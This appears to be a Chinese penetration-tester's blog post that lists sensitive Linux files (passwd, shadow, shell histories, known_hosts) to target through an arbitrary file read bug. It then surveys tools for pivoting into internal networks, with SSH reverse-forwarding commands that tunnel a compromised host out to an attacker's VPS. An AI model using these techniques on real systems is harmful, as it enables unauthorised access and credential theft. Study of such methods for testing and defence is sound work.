任意文件读取值得读的文件

一点关于任意文件读取的有价值的文件

LINUX

/etc/passwd 可以获取一些用户信息,获得用户目录,进一步读取用户目录内容

/etc/shadow 通过字典爆破密码,偶尔可以试试shadow.bak

.ssh/known_hosts 获得一些其他机器ip信息

.bash_history 从执行过的命令里找有价值信息

.viminfo 可能得到一些vim编辑过的文件的文件内容

.mysql_history mysql执行命令历史

/etc/rc.d/rc.local 可能发现开机要启动的任务,可能获得一些密码或者其他配置文件

另外是/proc/目录下的文件,可能挥霍的一些敏感信息

当前用户的crontab文件

一份fuzz列表

各种内网穿透方式总结

前言

水了好久的博客,本来说要经常更新文章,看来自己想多了,flag倒的很彻底,毕竟不怎么擅长写东西,以后应该会频繁起来。写的东西应该都是一些类似笔记一样的东西,或者是一些自己感兴趣的小东西,大佬们不要笑话我呀。

本地工具

proxychains4或者Proxifier。这边比较推荐的就是他俩。如果大佬们有更好用的可以推荐给我。

我日常渗透用的是MAC,并且我把一部分常用工具都搬到了我的OSX下,在我实际做渗透的时候发现更多情况下proxychains4要比Proxifier好用。

有些时候在用一些Python脚本(比如F-NAScan)通过代理扫描的时候Proxifier会全部误报,并且Proxifier在我的MAC上没办法正确代理MSF的流量,所以我一般选择的都是proxychains4。不知道有没有别的大佬也遇到过这种情况,如果有大佬知道怎么解决这个问题请py一下。

另外MAC上使用proxychains4是有坑的,要先去禁用SIP。

这里推荐proxychains4并不是说Proxifier不好用,只是有些情况不适用,但是Proxifier有他的强大之处,它可以自己指定规则,用起来很方便,尤其适用OSX下的一些客户端工具的流量代理,所以建议大家在实际使用的时候最好两者搭配起来使用。

HTTP代理

一般情况下就是reGeorg,GitHub上可以找到这个项目的,看一下readme就可以用了,HTTP代理的优势就是利用的就是本身的web端口,有效突破各种防火墙,但是缺点就是不够稳定。

在实际渗透中经常能遇到内网中的WEB服务器,通过nginx反代,或者经过堡垒机才能访问外网,这时候可能搞下来的WEB机器并不可以直接访问外网,这时候不得已的话只能采用HTTP代理。

Socks代理

Termite作为EW的进化版支持更多功能,两个版本的看情况使用,如果只是简单的Socks代理只要EW就够了,需要搭建特别复杂的网络环境的时候就要上Termite了。下面偷来小伙伴Rootclay记录的一堆使用命令总结

更加清楚的使用说明

TermiteEW可都是全平台通用的哦,并且并不需要特别高的权限就可以使用。

稳定SOCKS代理SSH

这个还是来自于小伙伴Rootclay的,他在文章中总结的已经很棒了,这边我再来大概总结一下。

大家都知道SSH可以进行端口转发,还可以通过SSH实现Socks代理,并且用SSH开启的Socks代理是非常稳定的。

那么问题来了,当搞下来的机器在内网的时候,成功在机器上新建了一个root用户或者拿到root用户密码了,并且这台机器还可以与外网通讯的时候,就可以采用小伙伴文章里面的办法了。
Rootclay的思路就是将目标机的ssh端口通过端口转发到外网vps,这样就可以直接连接目标机的ssh了,然后再按照正常的方法连接ssh启动Socks代理就可以了。

具体的启动命令:

1.用内网的机器连接你的vps并且转发ssh的端口 ssh -p 22 -qngfNTR 6666:localhost:22 VPS-user@VPS

这里将目标机的22端口转发到了vps上的6666端口,但是这里如果你到vps会发现6666端口是被监听在127.0.0.1

所以这里必须要修改一下ssh的配置文件,而且同时还要改一下超时等配置,详见

然后就可以正常的连接ssh并且开启Socks代理了ssh -p 6666 -qngfNTD 6767 内网用户@VPS
Socks端口开在本地的6767,就可以通过proxychains4或者Proxifier舒服的在内网里面漫游了。

VPN

关于VPN,这边推荐一个以前用过感觉还可以的工具softether

|